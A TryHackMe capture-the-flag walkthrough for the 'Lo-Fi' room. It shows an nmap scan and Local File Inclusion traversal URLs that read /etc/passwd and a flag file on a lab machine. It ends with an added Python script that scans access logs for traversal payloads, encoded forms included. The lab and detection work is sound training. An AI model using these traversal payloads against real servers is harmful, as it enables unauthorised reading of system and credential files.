Learn Lo-Fi — TryHackMe Walkthrough

NIkhil Kumar
2 min read · Jan 18, 2025

Challenge Name: Lo-Fi
Difficulty: Easy
Estimated Time: 35 minutes

Introduction

This challenge focuses on Local File Inclusion (LFI), a vulnerability that allows an attacker to read files on the target server. The goal is to locate and retrieve the flag stored in the root filesystem.

Steps to Complete the Challenge

Step 1: Deploy the Machines

  1. Start the vulnerable machine by clicking the green Start Machine button in the task.
  2. Launch the AttackBox by pressing the Start AttackBox button at the top-right corner of the page.
  3. Once the machines are running, note the target machine’s IP address (e.g., 10.10.50.96).

Step 2: Reconnaissance

  1. Open a terminal in the AttackBox.
  2. Perform a port scan using nmap to identify open ports on the target machine:
     nmap -sC -sV 10.10.50.96
  3. Results:
     • Port 22 (SSH)
     • Port 80 (HTTP)

Step 3: Explore the Web Application

  1. Navigate to the web application using the browser:
     http://10.10.50.96
  2. Review the webpage content and structure for potential vulnerabilities. No interactive features are immediately apparent, so test for common vulnerabilities such as LFI.

Step 4: Test for LFI

  1. Identify a parameter in the URL, such as ?page=.
  2. Test basic directory traversal payloads to confirm LFI:
     http://10.10.50.96/?page=/etc/passwd
     http://10.10.50.96/?page=../../../etc/passwd
  3. Expected Output: Contents of the /etc/passwd file, confirming LFI is present.

Step 5: Locate the Flag

  1. Use the LFI vulnerability to access the flag file. Try paths leading to the root directory:
     http://10.10.50.96/?page=../../../flag.txt
     http://10.10.50.96/index.php?page=../../../flag.txt
  2. Output: The page displays the flag:
     flag{e4478e0eab69bd642b8238765dcb7***}

Step 6: Submit the Flag

  1. Copy the retrieved flag.
  2. Submit the flag in the task prompt to complete the challenge.

Key Takeaways

  • LFI Basics: Local File Inclusion vulnerabilities can often be exploited by crafting malicious file paths to access sensitive files on the server.
  • Reconnaissance: Always begin with a port scan and analyze the web application’s behavior.
  • Payload Crafting: Iteratively test directory traversal techniques to reach the target file.
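
From the defender's side, the requests used in Steps 4 and 5 leave a recognizable trace in the web server's access log. The following is an added example, not part of the original walkthrough or the room: it scans log lines for a page parameter that carries an absolute path or a parent-directory segment, including percent-encoded forms. The log lines, the relax.php page name, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the room.
SAMPLE_LOG = """\
10.10.1.5 - - [18/Jan/2025:10:00:01 +0000] "GET /?page=relax.php HTTP/1.1" 200 4211
10.10.1.5 - - [18/Jan/2025:10:00:09 +0000] "GET /?page=/etc/passwd HTTP/1.1" 200 1730
10.10.1.5 - - [18/Jan/2025:10:00:15 +0000] "GET /?page=../../../etc/passwd HTTP/1.1" 200 1730
10.10.1.5 - - [18/Jan/2025:10:00:21 +0000] "GET /index.php?page=..%252f..%252f..%252fflag.txt HTTP/1.1" 200 58
10.10.1.7 - - [18/Jan/2025:10:01:02 +0000] "GET /style.css?v=1.2 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252f and %2f both become '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_page_value(value):
    """Return a reason string if the value looks like path traversal, else None."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/"):
        return "absolute path"
    if ".." in path.split("/"):
        return "parent-directory segment"
    return None

def find_lfi_attempts(log_text, param="page"):
    """Return (client_ip, value, reason, status) tuples for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qs already percent-decodes once; classify_page_value handles the rest.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            reason = classify_page_value(value)
            if reason:
                hits.append((ip, value, reason, status))
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is worth triaging first, since it suggests the server returned content rather than rejecting the path.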

Room Resources
